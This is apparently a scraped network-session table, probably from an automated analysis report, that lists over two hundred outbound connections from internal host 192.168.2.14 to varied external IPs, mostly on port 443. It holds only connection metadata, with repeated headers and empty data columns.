                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19303192.168.2.1441162166.152.218.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19304192.168.2.14548288.223.52.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19305192.168.2.1448872223.145.248.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19306192.168.2.1445446120.198.76.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19307192.168.2.1446554162.198.243.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19308192.168.2.1457978140.221.198.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19309192.168.2.1458586201.193.201.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19310192.168.2.1454928188.197.132.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19311192.168.2.145044881.22.94.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19312192.168.2.144732271.172.143.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19313192.168.2.1454220189.229.97.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19314192.168.2.1447226154.158.10.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19315192.168.2.144594877.120.77.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19316192.168.2.144876489.216.157.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19317192.168.2.1445408116.49.174.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19318192.168.2.144574637.112.64.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19319192.168.2.143490282.191.23.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19320192.168.2.1452808130.193.242.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19321192.168.2.145220458.225.205.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19322192.168.2.1448472158.108.60.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19323192.168.2.144229493.92.242.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19324192.168.2.1452356197.2.56.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19325192.168.2.144540436.244.66.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19326192.168.2.144063646.218.70.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19327192.168.2.1441992177.231.192.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19328192.168.2.1457462203.83.193.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19329192.168.2.1455482180.33.192.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19330192.168.2.1456162146.250.117.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19331192.168.2.1443680119.33.70.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19332192.168.2.1460844191.195.15.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19333192.168.2.1440384132.117.51.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19334192.168.2.144667861.241.225.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19335192.168.2.1445116114.110.210.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19336192.168.2.1443466113.173.130.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19337192.168.2.144321258.148.11.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19338192.168.2.145350034.98.86.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19339192.168.2.1450104128.231.28.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19340192.168.2.145181827.189.98.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19341192.168.2.14403704.244.125.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19342192.168.2.144436865.188.114.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19343192.168.2.145580668.80.209.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19344192.168.2.1442790217.7.126.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19345192.168.2.144784064.212.168.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19346192.168.2.1457766198.214.113.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19347192.168.2.1447726190.52.198.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19348192.168.2.144194664.163.42.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19349192.168.2.145686631.170.63.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19350192.168.2.145358286.129.87.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19351192.168.2.145791095.80.115.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19352192.168.2.1438538179.155.22.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19353192.168.2.1460742196.53.214.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19354192.168.2.144142285.201.248.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19355192.168.2.1450634144.38.255.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19356192.168.2.143302443.42.255.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19357192.168.2.1446422125.169.53.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19358192.168.2.1460746194.232.24.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19359192.168.2.144048641.228.142.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19360192.168.2.144287619.237.109.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19361192.168.2.1450946187.90.92.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19362192.168.2.145937869.252.67.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19363192.168.2.144584049.210.236.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19364192.168.2.1434182181.199.73.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19365192.168.2.1438248108.139.228.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19366192.168.2.143649239.219.153.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19367192.168.2.144808880.159.70.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19368192.168.2.1448894208.90.111.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19369192.168.2.143435668.58.58.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19370192.168.2.1444686161.163.31.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19371192.168.2.144552657.12.36.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19372192.168.2.1457476217.42.5.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19373192.168.2.1449890143.97.241.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19374192.168.2.145361012.90.153.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19375192.168.2.1448376176.98.172.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19376192.168.2.143894452.74.15.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19377192.168.2.1447278123.117.132.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19378192.168.2.144098096.182.6.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19379192.168.2.144615676.91.115.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19380192.168.2.144779871.125.234.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19381192.168.2.1454796130.191.140.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19382192.168.2.1453584204.198.160.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19383192.168.2.1440272110.122.151.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19384192.168.2.1436126223.102.197.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19385192.168.2.145507483.21.137.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19386192.168.2.1437234147.208.34.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19387192.168.2.144097231.241.191.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19388192.168.2.1450510130.120.157.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19389192.168.2.1450912210.133.103.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19390192.168.2.1450714204.101.181.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19391192.168.2.1453654202.107.100.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19392192.168.2.1452002148.96.184.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19393192.168.2.1442402210.11.46.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19394192.168.2.145789237.158.230.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19395192.168.2.1457140100.185.146.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19396192.168.2.143480820.42.129.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19397192.168.2.1455732209.244.20.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19398192.168.2.1439076113.183.112.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19399192.168.2.143975225.69.9.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19400192.168.2.1459220190.197.137.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19401192.168.2.1452534140.183.162.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19402192.168.2.144201844.203.190.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19403192.168.2.145039460.253.95.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19404192.168.2.144003619.243.31.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19405192.168.2.1452082129.157.21.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19406192.168.2.1447694158.224.123.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19407192.168.2.146010259.146.244.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19408192.168.2.145591827.91.138.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19409192.168.2.1434510172.179.248.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19410192.168.2.144866627.130.243.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19411192.168.2.144198864.46.164.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19412192.168.2.144429413.163.11.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19413192.168.2.1449902163.114.115.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19414192.168.2.1436054190.228.52.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19415192.168.2.145429053.114.91.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19416192.168.2.1444680136.42.101.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19417192.168.2.145218078.172.113.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19418192.168.2.1450398163.126.77.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19419192.168.2.144615471.193.111.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19420192.168.2.144679486.187.152.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19421192.168.2.144097875.207.217.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19422192.168.2.1439524177.252.107.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19423192.168.2.145306465.66.176.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19424192.168.2.1458684205.245.49.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19425192.168.2.1448160109.21.179.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19426192.168.2.1442508101.130.21.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19427192.168.2.1440472128.65.60.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19428192.168.2.1458280183.154.135.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19429192.168.2.1454892145.182.64.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19430192.168.2.145857227.200.207.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19431192.168.2.1458608213.210.249.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19432192.168.2.143412281.22.45.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19433192.168.2.1438266129.104.94.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19434192.168.2.144938696.87.222.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19435192.168.2.145711227.68.41.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19436192.168.2.1451438126.136.45.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19437192.168.2.1451192173.126.251.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19438192.168.2.1441024145.146.240.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19439192.168.2.1439144107.166.90.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19440192.168.2.1444788212.122.171.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19441192.168.2.143923817.228.77.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19442192.168.2.1444716216.103.41.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19443192.168.2.144509072.218.238.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19444192.168.2.143976064.197.199.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19445192.168.2.144434819.51.100.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19446192.168.2.145412887.107.95.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19447192.168.2.1456026102.202.21.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19448192.168.2.146098475.183.237.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19449192.168.2.1460152149.130.212.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19450192.168.2.144101849.17.48.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19451192.168.2.1448436106.74.24.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19452192.168.2.1460556184.110.89.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19453192.168.2.1449514182.43.208.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19454192.168.2.1443892195.142.124.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19455192.168.2.144254453.247.152.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19456192.168.2.14428881.251.174.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19457192.168.2.143779281.100.147.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19458192.168.2.14407104.48.96.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19459192.168.2.144495444.12.49.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19460192.168.2.1438290202.175.186.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19461192.168.2.145212898.83.67.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19462192.168.2.145636646.160.35.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19463192.168.2.1441170198.70.135.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19464192.168.2.143891285.204.167.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19465192.168.2.1452282185.138.69.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19466192.168.2.14539428.194.99.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19467192.168.2.145537845.182.63.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19468192.168.2.14380622.85.178.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19469192.168.2.145335413.41.101.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19470192.168.2.14491845.78.211.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19471192.168.2.143576413.132.222.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19472192.168.2.145347860.76.172.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19473192.168.2.143515661.182.40.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19474192.168.2.1441136176.155.202.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19475192.168.2.143611019.158.159.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19476192.168.2.1455924176.58.42.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19477192.168.2.1458510177.76.108.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19478192.168.2.143512642.239.143.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19479192.168.2.1436594120.59.172.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19480192.168.2.1453142121.175.194.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19481192.168.2.145918093.117.12.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19482192.168.2.145624867.110.169.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19483192.168.2.1460596146.100.25.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19484192.168.2.146051040.202.241.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19485192.168.2.144557451.234.36.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19486192.168.2.1451134164.49.108.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19487192.168.2.1437286153.158.203.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19488192.168.2.143976272.77.1.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19489192.168.2.144358277.53.231.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19490192.168.2.1446404179.124.230.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19491192.168.2.144768627.178.119.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19492192.168.2.1454344212.13.12.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19493192.168.2.1453940219.171.120.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19494192.168.2.1445286137.27.190.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19495192.168.2.1458942213.51.243.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19496192.168.2.1457686217.88.12.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19497192.168.2.1449450104.243.141.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19498192.168.2.1451966119.255.164.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19499192.168.2.1458114115.104.12.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19500192.168.2.1442872116.178.208.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19501192.168.2.14358109.218.118.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19502192.168.2.143457052.21.123.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19503192.168.2.1440044187.207.190.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19504192.168.2.1445608201.254.1.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19505192.168.2.1456348100.0.24.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19506192.168.2.145355473.118.232.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19507192.168.2.143359018.24.236.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19508192.168.2.1448944116.112.149.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19509192.168.2.1450376140.32.210.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19510192.168.2.1440350117.153.173.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19511192.168.2.1436444102.81.68.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19512192.168.2.1441660184.146.98.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19513192.168.2.145141470.239.88.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19514192.168.2.143860054.226.39.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19515192.168.2.143368467.143.132.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19516192.168.2.1458532172.210.200.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19517192.168.2.1436226187.63.128.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19518192.168.2.1449100135.25.162.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19519192.168.2.1434710106.182.137.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19520192.168.2.1450740210.229.106.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19521192.168.2.1445738152.179.231.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19522192.168.2.14583265.207.131.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19523192.168.2.143511425.72.12.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19524192.168.2.145631090.141.170.42443
